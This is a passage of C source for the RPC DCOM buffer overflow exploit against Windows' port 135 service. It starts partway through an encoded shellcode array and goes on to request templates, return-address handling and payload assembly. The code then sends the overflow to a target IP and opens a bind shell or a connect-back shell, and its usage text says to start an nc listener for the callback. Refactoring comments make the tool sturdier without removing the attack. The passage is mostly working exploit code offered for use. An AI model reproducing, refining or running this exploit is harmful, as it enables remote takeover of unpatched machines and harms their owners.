"\xed\xfc\xc9\xf0\xe9\xfc\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6"
"\xfa\xfc\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
"\xf0\xe9\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc"
"\xea\xea\x99\xba\xee\xea\xf6\xfa\xf2\xaa\xab\xb7\xfd\xf5\xf5\x99"
"\xce\xca\xd8\xca\xed\xf8\xeb\xed\xec\xe9\x99\xea\xf6\xfa\xf2\xfc"
"\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa"
"\xfa\xfc\xe9\xed\x99\xfa\xf6\xf7\xf7\xfc\xfa\xed\x99\xea\xfc\xf7"
"\xfd\x99\xeb\xfc\xfa\xef\x99\xf0\xf6\xfa\xed\xf5\xea\xf6\xfa\xf2"
"\xfc\xed\x99\xea\xfc\xed\xea\xf6\xfa\xf2\xf6\xe9\xed\x99\xfe\xfc"
"\xed\xe9\xfc\xfc\xeb\xf7\xf8\xf4\xfc\x99\xfa\xf5\xf6\xea\xfc\xea"
"\xf6\xfa\xf2\xfc\xed\x99\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xfc\xe1"
"\xf0\xed\x94\x93\x99\xcd\xc1\x99\x90\x90";
/* Trailing request fragment: main() appends it verbatim to buf2 right after
 * request3, and none of its bytes are patched afterwards.  The contents are
 * exactly those of the original listing, laid out eight per row; the row
 * comments give the offset of each row's first byte. */
unsigned char request4[] = {
    /* 0x00 */ 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc,
    /* 0x08 */ 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2d, 0x00,
    /* 0x10 */ 0x00, 0x00, 0x00, 0x00, 0x88, 0x2a, 0x0c, 0x00,
    /* 0x18 */ 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    /* 0x20 */ 0x28, 0x8c, 0x0c, 0x00, 0x01, 0x00, 0x00, 0x00,
    /* 0x28 */ 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
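/* Value of one hex digit, or -1 when ch is not one of [0-9a-fA-F]. */
static int hex_nibble(unsigned char ch)
{
    if (ch >= '0' && ch <= '9')
        return ch - '0';
    if (ch >= 'a' && ch <= 'f')
        return ch - 'a' + 10;
    if (ch >= 'A' && ch <= 'F')
        return ch - 'A' + 10;
    return -1;
}

/*
 * Convert the two hex digits h1 (high nibble) and h2 (low nibble) into a
 * single byte and store it in c[0].
 *
 * Side effect is unchanged from the original: a character that is not a hex
 * digit contributes 0 to the byte, so callers that ignore the return value
 * (main() does) see exactly the old result.
 *
 * Returns 0 when both characters were hex digits and -1 otherwise.  The
 * original was declared to return int but never returned anything, so its
 * callers could not detect a malformed offset string.
 */
int C_H(unsigned char *c, unsigned char h1, unsigned char h2)
{
    int hi = hex_nibble(h1);
    int lo = hex_nibble(h2);
    int valid = (hi >= 0 && lo >= 0);

    if (hi < 0)
        hi = 0;
    if (lo < 0)
        lo = 0;
    c[0] = (unsigned char)(hi * 16 + lo);
    return valid ? 0 : -1;
}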
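/* Byte positions inside sc: where the 4-byte return address is written and
 * where the shellcode body starts, plus the strncpy window used for it
 * (36 / 48 / 1976 in the original). */
enum { SC_RET_OFF = 36, SC_BODY_OFF = 48, SC_BODY_LEN = 1976 };

/* Offsets into the assembled request (buf2) of the 32-bit fields that must
 * grow by sizeof(sc) - 0xc.  Values are carried over verbatim from the
 * original; what each field means inside the RPC request is not derived here. */
static const size_t buf2_len_fields[] = {
    0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c
};

/* Add delta to the native-order 32-bit value stored at p.  memcpy replaces
 * the original *(DWORD *) casts, which were both potentially misaligned and a
 * strict-aliasing violation; the resulting bytes are identical. */
static void add_u32(void *p, unsigned int delta)
{
    unsigned int v;

    memcpy(&v, p, sizeof v);
    v += delta;
    memcpy(p, &v, sizeof v);
}

/* Parse an explicit return address written as "xHHHHHHHH" (exactly eight hex
 * digits).  Returns 0 and stores the numeric value in *out, or -1 when the
 * argument is malformed.  The original read argv[1][1..8] unconditionally,
 * so a shorter argument was read past its terminator, and non-hex characters
 * were silently treated as 0. */
static int parse_hex_offset(const char *arg, unsigned long *out)
{
    static const char hexdigits[] = "0123456789abcdefABCDEF";
    unsigned long value = 0;
    int i;

    if (arg == NULL || arg[0] != 'x' || strlen(arg) != 9)
        return -1;
    /* arg[1..8] are non-NUL here, so strchr cannot match the terminator. */
    for (i = 1; i <= 8; i++) {
        if (strchr(hexdigits, arg[i]) == NULL)
            return -1;
    }
    for (i = 0; i < 4; i++) {
        unsigned char byte = 0;

        C_H(&byte, (unsigned char)arg[i * 2 + 1], (unsigned char)arg[i * 2 + 2]);
        value = (value << 8) | byte;
    }
    *out = value;
    return 0;
}

/* Parse a decimal TCP port.  Returns 1..65535, or -1 on bad input (the
 * original's atoi() turned garbage into port 0 without complaint). */
static int parse_port(const char *arg)
{
    char *end;
    long v;

    v = strtol(arg, &end, 10);
    if (end == arg || *end != '\0' || v < 1 || v > 65535)
        return -1;
    return (int)v;
}

/* Send exactly len bytes, looping over partial sends.  Returns 0 on success,
 * -1 on a send error or when the peer has closed the connection. */
static int send_all(SOCKET s, const void *data, size_t len)
{
    const char *p = (const char *)data;
    size_t done = 0;

    while (done < len) {
        int n = send(s, p + done, (int)(len - done), 0);

        if (n <= 0)
            return -1;
        done += (size_t)n;
    }
    return 0;
}

/* Report the last socket error for the step named by what, using the
 * platform's error channel as the original did. */
static void report_socket_error(const char *what)
{
#ifdef WIN32
    printf("%s failed.Error:%d\n", what, WSAGetLastError());
#else
    perror(what);
#endif
}

/*
 * Entry point.
 *
 *   argv[1]  index into targets[], or "xHHHHHHHH" for an explicit return
 *            address (stored little-endian at sc+36)
 *   argv[2]  target IP, dotted quad
 *   argv[3]  bind port (3-argument form) or connect-back IP (4-argument form)
 *   argv[4]  connect-back port (4-argument form)
 *
 * Every argument is validated and the whole request is assembled in buf2
 * before the TCP connection is opened; the original connected first and then
 * exited on a bad offset, leaving a half-open connection on the target for
 * every usage error.  The original's `#endif return;` also handed the return
 * to the preprocessor, so a failed send fell through to the final recv();
 * here every failure returns 1.
 *
 * Returns 0 once both requests were sent and the verdict printed, 1 on any
 * usage, setup or I/O error.
 */
int main(int argc, char **argv)
{
    SOCKET sock;
#ifdef WIN32
    WSADATA WSAData;
    SOCKADDR_IN addr_in;
#else
    struct sockaddr_in addr_in;
#endif
    unsigned short port = 135;          /* TCP port hard-coded by the original */
    unsigned char buf1[0x1000];         /* replies; contents are never inspected */
    unsigned char buf2[0x1000];         /* assembled request */
    size_t total, off, i;
    unsigned long target_ip;
    unsigned long ret = 0;              /* return address; 0 means "not resolved" */
    int ntargets, t, n;

    printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
    printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
    printf("Thanks for TopHacker!Use Win32 ShellCode (Win32sc.h) Version 1.3.0\n");
    printf("Modified and Compiled by tsing(tsingstudio@msn.com) \n");
    printf("Please only use it to test your machine !!\n");

    /* Count the targets table once.  The original reused 'len' for this and
     * later overwrote it with recv() results. */
    for (ntargets = 0; targets[ntargets].os[0] != '\0'; ntargets++)
        ;

    if (argc < 3 || argc > 5) {
        printf("\nUsage:%s Os[x(offset)] targetip ([bindport(1234)]|[localIP] [LocalPort]) \n", argv[0]);
        printf("%s 7 127.0.0.1 (bind 1234)\n", argv[0]);
        printf("%s 7 127.0.0.1 99 (bind 99)\n", argv[0]);
        printf("%s 7 192.168.6.1 192.168.6.2 99 (connect back 192.168.6.2 99 ,run nc -l -p LocalPort before!) \n", argv[0]);
        printf("%s x77e22c29 192.168.6.1 192.168.6.2 99 (use offset x77e22c29)\n", argv[0]);
        for (t = 0; t < ntargets; t++) {
            printf("%s-%d\t", targets[t].os, t);
            if (t % 2 == 0)
                printf("\n");
        }
        printf("\n");
        return 1;
    }

#ifdef WIN32
    if (WSAStartup(MAKEWORD(2, 0), &WSAData) != 0) {
        printf("WSAStartup error.Error:%d\n", WSAGetLastError());
        return 1;
    }
#endif

    /* inet_addr() reports a malformed address as INADDR_NONE (all ones);
     * the original fed that straight into connect(). */
    target_ip = inet_addr(argv[2]);
    if (target_ip == 0xFFFFFFFFUL) {
        printf("Invalid target ip: %s\n", argv[2]);
        return 1;
    }

    /* Shellcode parameters.  The SH_WORK* macros are not defined in this
     * file (presumably Win32sc.h); the original's comment on SH_WORKEXIT(1)
     * reads "Terminate Process". */
    SH_WORKEXIT(1);
    if (argc == 5) {
        unsigned long cb_ip = inet_addr(argv[3]);
        int cb_port = parse_port(argv[4]);

        if (cb_ip == 0xFFFFFFFFUL || cb_port < 0) {
            printf("Invalid connect-back address/port: %s %s\n", argv[3], argv[4]);
            return 1;
        }
        SH_WORKMODE(SH_WORKMODE_CALLBACK);
        SH_WORKHOST(cb_ip);
        SH_WORKPORT(cb_port);
    } else {
        int bind_port = 1234;           /* default named in the usage text */

        if (argc == 4) {
            bind_port = parse_port(argv[3]);
            if (bind_port < 0) {
                printf("Invalid bind port: %s\n", argv[3]);
                return 1;
            }
        }
        SH_WORKMODE(SH_WORKMODE_BIND);
        SH_WORKPORT(bind_port);
    }

    /* Resolve the return address: table index, or an explicit "xHHHHHHHH".
     * atoi() in the original mapped any non-numeric index to target 0. */
    if (argv[1][0] != 'x') {
        char *end;
        long id = strtol(argv[1], &end, 10);

        if (end == argv[1] || *end != '\0' || id < 0) {
            printf("Need correct offset!\n");
            return 1;
        }
        /* The 8888 branch was emptied upstream ("I delete this code ...");
         * it now just leaves ret at 0 and fails the check below. */
        if (id != 8888 && id < ntargets)
            ret = targets[id].offset;
    } else if (parse_hex_offset(argv[1], &ret) != 0) {
        printf("Need correct offset!\n");
        return 1;
    }
    if (ret == 0) {
        printf("Need correct offset!\n");
        return 1;
    }

    /* Store the low 32 bits of ret little-endian at sc+36.  The original
     * memcpy'd the first four bytes of ret, which is the same thing on a
     * little-endian host; this form does not depend on host byte order or
     * on sizeof(unsigned long). */
    for (i = 0; i < 4; i++)
        sc[SC_RET_OFF + i] = (unsigned char)((ret >> (8 * i)) & 0xff);

    /* strncpy stops at the first NUL in ShellCode and zero-fills the rest of
     * the 1976-byte window, so the encoded shellcode is assumed to be
     * NUL-free (TODO confirm against its definition).  The window must fit
     * inside sc; the original wrote it unconditionally. */
    if (sizeof(sc) < (size_t)(SC_BODY_OFF + SC_BODY_LEN)) {
        printf("sc is too small for the shellcode window\n");
        return 1;
    }
    strncpy(sc + SC_BODY_OFF, ShellCode, SC_BODY_LEN);

    /* Assemble request1 | request2 | sc | request3 | request4 into buf2,
     * checking the total against the buffer first (the original did not). */
    total = sizeof(request1) + sizeof(request2) + sizeof(sc)
          + sizeof(request3) + sizeof(request4);
    if (total > sizeof(buf2)) {
        printf("request of %lu bytes does not fit in buf2\n", (unsigned long)total);
        return 1;
    }
    off = 0;
    memcpy(buf2 + off, request1, sizeof(request1)); off += sizeof(request1);
    memcpy(buf2 + off, request2, sizeof(request2)); off += sizeof(request2);
    memcpy(buf2 + off, sc, sizeof(sc));             off += sizeof(sc);
    memcpy(buf2 + off, request3, sizeof(request3)); off += sizeof(request3);
    memcpy(buf2 + off, request4, sizeof(request4)); off += sizeof(request4);

    /* request2's 32-bit fields at +0 and +8 grow by half the sc size.  The
     * original patched the global request2 in place before copying it;
     * patching the copy in buf2 yields the same bytes on the wire. */
    add_u32(buf2 + sizeof(request1), (unsigned int)(sizeof(sc) / 2));
    add_u32(buf2 + sizeof(request1) + 8, (unsigned int)(sizeof(sc) / 2));
    for (i = 0; i < sizeof(buf2_len_fields) / sizeof(buf2_len_fields[0]); i++) {
        if (buf2_len_fields[i] + 4 > total) {
            printf("fixup offset 0x%lx lies outside the request\n",
                   (unsigned long)buf2_len_fields[i]);
            return 1;
        }
        add_u32(buf2 + buf2_len_fields[i], (unsigned int)(sizeof(sc) - 0xc));
    }

    memset(&addr_in, 0, sizeof(addr_in));
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(port);
#ifdef WIN32
    addr_in.sin_addr.S_un.S_addr = target_ip;
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        report_socket_error("Socket");
        return 1;
    }
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                   NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        report_socket_error("Connect");
        return 1;
    }
#else
    addr_in.sin_addr.s_addr = target_ip;
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        report_socket_error("Socket");
        return 1;
    }
    if (connect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in)) != 0) {
        report_socket_error("Connect");
        return 1;
    }
#endif

    if (send_all(sock, bindstr, sizeof(bindstr)) != 0) {
        report_socket_error("Send");
        return 1;
    }
    /* The reply to bindstr is not parsed, but with no reply at all there is
     * nothing to continue against, so do not send the payload blind. */
    n = recv(sock, (char *)buf1, 1000, 0);
    if (n <= 0) {
        printf("No reply to the initial request (recv returned %d)\n", n);
        return 1;
    }

    if (send_all(sock, buf2, total) != 0) {
        report_socket_error("Send");
        return 1;
    }

    /* Verdict, unchanged from the original: a failed recv (presumably the
     * connection being reset) is read as the overflow having taken effect,
     * while any reply -- including an orderly close, n == 0 -- is reported as
     * failure.  Nothing in buf1 is examined. */
    n = recv(sock, (char *)buf1, 1024, 0);
    if (n != -1)
        printf("Failed! Maybe have patched!\n");
    else
        printf("overflow Success !(if can't get shell ,try other offset ..... @.@....)\n");

    return 0;
}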